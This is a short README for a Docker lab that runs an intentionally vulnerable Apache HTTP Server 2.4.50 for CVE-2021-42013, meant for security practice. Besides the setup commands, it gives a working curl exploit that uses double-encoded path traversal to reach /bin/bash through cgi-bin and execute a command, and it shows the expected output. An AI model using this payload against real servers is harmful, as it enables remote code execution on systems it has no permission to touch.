apache cve cve-2021-42013 http-server lfi rce vulnerability docker

CVE-2021-42013 Vulnerable service

Installation

Several options:

1. Docker container

docker run -d -p 8080:80 12345qwert123456/apache_2_4_50_cve-2021-42013

2. Dockerfile

git clone https://github.com/12345qwert123456/CVE-2021-42013.git

cd CVE-2021-42013-Vulnerable-service/2.4.50

docker build -t apache_2_4_50_cve-2021-42013 .

docker run -d -p 8080:80 apache_2_4_50_cve-2021-42013

Explotation

Command:

curl --path-as-is -d "echo Content-Type: text/plain; echo; id" "http://127.0.0.1:8080/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash"

Expected output:

uid=1(daemon) gid=1(daemon) groups=1(daemon)

About

Vulnerable configuration Apache HTTP Server version 2.4.49/2.4.50

apache cve cve-2021-42013 http-server lfi rce vulnerability docker

Languages

Language:Dockerfile 100.0%